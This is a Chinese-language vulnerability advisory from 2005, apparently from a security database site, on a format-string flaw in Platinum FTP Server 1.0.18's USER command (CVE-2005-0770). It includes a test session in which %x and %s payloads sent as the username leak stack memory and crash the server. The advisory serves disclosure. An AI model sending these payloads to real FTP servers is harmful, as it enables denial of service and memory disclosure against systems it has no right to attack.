Platinum FTP Server USER命令格式串处理漏洞
发布日期:2005-03-17
更新日期:2005-03-17
受影响系统:PlatinumFTP PlatinumFTP Server 1.0.18
描述:
CVE(CAN) ID:
CVE-2005-0770
Platinum FTP Server是Windows平台下的一款强大的FTP服务器。
Platinum FTP Server对USER命令的参数的处理存在格式串溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。
<*来源:Kaveh Razavi (
c0d3r@ihsteam.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111100269512216&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x
331 Password required for AAAA026d00480203133337373615064726f7771657220657269756
f6620644141207278254141782578257825782578257825782578257825782578257825782578257
82578257825782578257825782578257825782578257825782578257825782578257825782578257
825782578257825d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAA¼²ßP¦ .
Password:
---------------------------------------
ftp> user AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe szAppVer : 1.0.0.18
szModName : user32.dll szModVer : 5.1.2600.1106 offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the memory could not be "written".
---------------------------------------
建议:
厂商补丁:
PlatinumFTP
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.platinumftp.com/platinumftpserver.php浏览次数:2835
严重程度:0(网友投票)